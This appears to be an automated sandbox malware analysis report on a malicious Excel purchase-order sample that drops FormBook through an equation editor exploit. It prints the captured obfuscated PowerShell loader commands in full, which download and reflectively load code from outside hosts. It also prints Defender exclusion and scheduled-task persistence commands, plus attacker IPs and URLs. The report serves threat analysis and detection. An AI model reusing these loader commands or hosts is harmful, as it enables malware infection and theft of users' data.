E5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\niLILOT.exe C:\Users\user\AppData\Roaming\niLILOT.exe
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'su5wt0tflwvycfjfu1njt04oicgnyycrj0yxdxjsid0gjysnzlgnkydoahr0chm6ly9yyscrj3cnkycuz2l0ahvijysndxnlcmnvbnrljysnbnquy28nkydtl05vjysnrgv0zscrj2mnkyd0t24vtm8nkydezxrly3rpbicrjy9yzwzzl2hlywrzl21haw4nkycvrgv0ywhojysnb3rolvyujysndhh0zicrj1gnkydojysnoybjricrjzenkydiyxmnkydljysnnjrdb250jysnzw50jysnid0nkycgjysnke5ldy0nkydpymply3qgjysnu3lzdccrj2unkydtlicrj04nkydldc5xzwjdjysnbgknkydlbicrj3qpjysnlkrvd25sb2fku3ryaw4nkydnkgngmxvybck7jysnigngjysnmwjpjysnbicrj2enkydyeumnkydvbnrlbnqgpsbbu3knkydzdgvtlkmnkydvbicrj3ynkydljysncnqnkyddjysnojpgcm8nkydtqmfzzty0u3ryjysnaw5nkgngmwjhc2u2nenvjysnbnrljysnbnqpoybjrjenkydhjysnc3nlbwjsesa9iftsjysnzwzszwn0ascrj29ulkfzcycrj2vtymx5jysnxtonkyc6tg9hzchjricrjzfiaw5hcnknkyddb250zw50ktsgjysnwycrj2rubglilklplkhvbwvdojpwqukoce5bdccrj3gnkyd0lljfukmnkyddui8zmzmvodiumtqujysnmdqyljgzly86chr0ahboqswgce4nkydbzgvzyscrj3rpdmfkb3boqswgce5bzgvzyxrpjysndmfkb3ankydoqswnkycgce5bzccrj2vzyxrpdmfkb3boqswgce5byscrj3nwbmv0x3inkydlz2jyb3dzzxjzce5blcbwtkfwjysntkenkycsce5bcccrj05bkscplnjlugxhq2uoj2zyaccsw1nucmlur11bq2hhcl0zoskucmvqbgfdzsgow0noyxjdotkrw0noyxjdnzarw0noyxjdndkplfttvhjpbkddw0noyxjdmzyplnjlugxhq2uokftdagfyxtexmitbq2hhcl03octbq2hhcl02nsksw1nucmlur11bq2hhcl0znckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "invoke-expression( ('c'+'f1url = '+'fx'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/no'+'dete'+'c'+'ton/no'+'detecton'+'/refs/heads/main'+'/detahn'+'oth-v.'+'txtf'+'x'+'h'+'; cf'+'1'+'bas'+'e'+'64cont'+'ent'+' ='+' '+'(new-'+'object '+'syst'+'e'+'m.'+'n'+'et.webc'+'li'+'en'+'t)'+'.downloadstrin'+'g(cf1url);'+' cf'+'1bi'+'n'+'a'+'ryc'+'ontent = [sy'+'stem.c'+'on'+'v'+'e'+'rt'+']'+'::fro'+'mbase64str'+'ing(cf1base64co'+'nte'+'nt); cf1'+'a'+'ssembly = [r'+'eflecti'+'on.ass'+'embly'+']:'+':load(cf'+'1binary'+'content); '+'['+'dnlib.io.home]::vai(pnat'+'x'+'t.rerc'+'cr/333/82.14.'+'042.83//:ptthpna, pn'+'adesa'+'tivadopna, pnadesati'+'vadop'+'na,'+' pnad'+'esativadopna, pnaa'+'spnet_r'+'egbrowserspna, pnap'+'na'+',pnap'+'na)').replace('fxh',[string][char]39).replace(([char]99+[char]70+[char]49),[string][char]36).replace(([char]112+[char]78+[char]65),[string][char]34))"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'su5wt0tflwvycfjfu1njt04oicgnyycrj0yxdxjsid0gjysnzlgnkydoahr0chm6ly9yyscrj3cnkycuz2l0ahvijysndxnlcmnvbnrljysnbnquy28nkydtl05vjysnrgv0zscrj2mnkyd0t24vtm8nkydezxrly3rpbicrjy9yzwzzl2hlywrzl21haw4nkycvrgv0ywhojysnb3rolvyujysndhh0zicrj1gnkydojysnoybjricrjzenkydiyxmnkydljysnnjrdb250jysnzw50jysnid0nkycgjysnke5ldy0nkydpymply3qgjysnu3lzdccrj2unkydtlicrj04nkydldc5xzwjdjysnbgknkydlbicrj3qpjysnlkrvd25sb2fku3ryaw4nkydnkgngmxvybck7jysnigngjysnmwjpjysnbicrj2enkydyeumnkydvbnrlbnqgpsbbu3knkydzdgvtlkmnkydvbicrj3ynkydljysncnqnkyddjysnojpgcm8nkydtqmfzzty0u3ryjysnaw5nkgngmwjhc2u2nenvjysnbnrljysnbnqpoybjrjenkydhjysnc3nlbwjsesa9iftsjysnzwzszwn0ascrj29ulkfzcycrj2vtymx5jysnxtonkyc6tg9hzchjricrjzfiaw5hcnknkyddb250zw50ktsgjysnwycrj2rubglilklplkhvbwvdojpwqukoce5bdccrj3gnkyd0lljfukmnkyddui8zmzmvodiumtqujysnmdqyljgzly86chr0ahboqswgce4nkydbzgvzyscrj3rpdmfkb3boqswgce5bzgvzyxrpjysndmfkb3ankydoqswnkycgce5bzccrj2vzyxrpdmfkb3boqswgce5byscrj3nwbmv0x3inkydlz2jyb3dzzxjzce5blcbwtkfwjysntkenkycsce5bcccrj05bkscplnjlugxhq2uoj2zyaccsw1nucmlur11bq2hhcl0zoskucmvqbgfdzsgow0noyxjdotkrw0noyxjdnzarw0noyxjdndkplfttvhjpbkddw0noyxjdmzyplnjlugxhq2uokftdagfyxtexmitbq2hhcl03octbq2hhcl02nsksw1nucmlur11bq2hhcl0znckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "invoke-expression( ('c'+'f1url = '+'fx'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/no'+'dete'+'c'+'ton/no'+'detecton'+'/refs/heads/main'+'/detahn'+'oth-v.'+'txtf'+'x'+'h'+'; cf'+'1'+'bas'+'e'+'64cont'+'ent'+' ='+' '+'(new-'+'object '+'syst'+'e'+'m.'+'n'+'et.webc'+'li'+'en'+'t)'+'.downloadstrin'+'g(cf1url);'+' cf'+'1bi'+'n'+'a'+'ryc'+'ontent = [sy'+'stem.c'+'on'+'v'+'e'+'rt'+']'+'::fro'+'mbase64str'+'ing(cf1base64co'+'nte'+'nt); cf1'+'a'+'ssembly = [r'+'eflecti'+'on.ass'+'embly'+']:'+':load(cf'+'1binary'+'content); '+'['+'dnlib.io.home]::vai(pnat'+'x'+'t.rerc'+'cr/333/82.14.'+'042.83//:ptthpna, pn'+'adesa'+'tivadopna, pnadesati'+'vadop'+'na,'+' pnad'+'esativadopna, pnaa'+'spnet_r'+'egbrowserspna, pnap'+'na'+',pnap'+'na)').replace('fxh',[string][char]39).replace(([char]99+[char]70+[char]49),[string][char]36).replace(([char]112+[char]78+[char]65),[string][char]34))" Jump to behavior
Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman-
Source: explorer.exe, 00000017.00000000.486739927.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000002.637647033.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000017.00000000.486739927.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000002.637647033.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000017.00000000.486739927.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000002.637647033.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\mstsc.exe Code function: GetLocaleInfoW,wcsncmp, 27_2_0093770C
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Queries volume information: C:\Users\user\AppData\Roaming\niLILOT.exe VolumeInformation
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00934143 GetSystemTime,SystemTimeToFileTime,GetLastError, 27_2_00934143
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0092B0AA GetUserNameExW,GetLastError,wcschr,GetComputerNameW,GetLastError,GetLastError,GetLastError,_wcsnicmp, 27_2_0092B0AA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008F395D GetVersionExW,CoInitialize,CoCreateInstance,SysFreeString,CoUninitialize, 27_2_008F395D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0092CA2C LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree, 27_2_0092CA2C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0092C3D8 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree, 27_2_0092C3D8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00930486 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW, 27_2_00930486
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0093061E RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree, 27_2_0093061E
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527625 Sample: PO.78NO9.xls Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 73 m2g.me 2->73 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for dropped file 2->91 93 20 other signatures 2->93 14 EXCEL.EXE 59 35 2->14         started        18 taskeng.exe 2->18         started        signatures3 process4 dnsIp5 83 m2g.me 14.194.50.211, 443, 49161, 49163 TTSLMEIS-AS-APTTSL-ISPDIVISIONIN India 14->83 85 38.240.41.28, 49162, 49169, 49170 COGENT-174US United States 14->85 71 C:\Users\user\Desktop\PO.78NO9.xls (copy), Composite 14->71 dropped 20 wscript.exe 1 14->20         started        23 WINWORD.EXE 348 31 14->23         started        27 niLILOT.exe 18->27         started        file6 process7 dnsIp8 97 Suspicious powershell command line found 20->97 99 Wscript starts Powershell (via cmd or directly) 20->99 101 Bypasses PowerShell execution policy 20->101 109 2 other signatures 20->109 29 powershell.exe 4 20->29         started        81 m2g.me 23->81 65 C:\Users\user\AppData\Roaming\...\m2g.me.url, MS 23->65 dropped 67 C:\Users\user\AppData\Roaming\...\a080.url, MS 23->67 dropped 69 ~WRF{71025B50-9EA6...0-2B9E7555DC6C}.tmp, Composite 23->69 dropped 103 Microsoft Office launches external ms-search protocol handler (WebDAV) 23->103 105 Office viewer loads remote template 23->105 107 Microsoft Office drops suspicious files 23->107 32 EQNEDT32.EXE 12 23->32         started        file9 signatures10 process11 file12 141 Suspicious powershell command line found 29->141 143 Obfuscated command line found 29->143 35 powershell.exe 12 5 29->35         started        59 C:\Users\...\wegivenewthingssoonsweetnes.vbS, Unicode 32->59 dropped 145 Office equation editor establishes network connection 32->145 147 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 32->147 signatures13 process14 dnsIp15 79 raw.githubusercontent.com 185.199.108.133, 443, 49171 FASTLYUS Netherlands 35->79 111 Writes to foreign memory regions 35->111 113 Injects a PE file into a foreign processes 35->113 39 aspnet_regbrowsers.exe 5 35->39         started        signatures16 process17 file18 61 C:\Users\user\AppData\Roaming\niLILOT.exe, PE32 39->61 dropped 63 C:\Users\user\AppData\Local\...\tmpB50D.tmp, XML 39->63 dropped 123 Uses schtasks.exe or at.exe to add and modify task schedules 39->123 125 Adds a directory exclusion to Windows Defender 39->125 127 Tries to detect virtualization through RDTSC time measurements 39->127 129 Injects a PE file into a foreign processes 39->129 43 aspnet_regbrowsers.exe 39->43         started        46 powershell.exe 4 39->46         started        48 schtasks.exe 39->48         started        signatures19 process20 signatures21 131 Modifies the context of a thread in another process (thread injection) 43->131 133 Maps a DLL or memory area into another process 43->133 135 Sample uses process hollowing technique 43->135 139 2 other signatures 43->139 50 explorer.exe 43->50 injected 137 Installs new ROOT certificates 46->137 process22 dnsIp23 75 www.senior-dating-73474.bond 50->75 77 www.my-tournament.live 50->77 95 System process connects to network (likely due to code injection or exploit) 50->95 54 mstsc.exe 50->54         started        signatures24 process25 signatures26 115 Modifies the context of a thread in another process (thread injection) 54->115 117 Maps a DLL or memory area into another process 54->117 119 Tries to detect virtualization through RDTSC time measurements 54->119 121 2 other signatures 54->121 57 cmd.exe 54->57         started        process27
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
14.194.50.211
 m2g.me India
55441 TTSLMEIS-AS-APTTSL-ISPDIVISIONIN true
185.199.108.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
38.240.41.28
 unknown United States
174 COGENT-174US true

Contacted Domains

Name IP Active
m2g.me 14.194.50.211 true
raw.githubusercontent.com 185.199.108.133 true
www.senior-dating-73474.bond unknown unknown
www.my-tournament.live unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://38.240.41.28/333/RCCRER.txt true unknown
http://38.240.41.28/333/wegivenewthingssoonsweetness.tIF true
    		unknown
    www.lefeetlab.net/gwdv/ true
      		unknown
      https://m2g.me/a080 false
        		unknown
        https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt false
          		unknown
          http://38.240.41.28/333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc true
            		unknown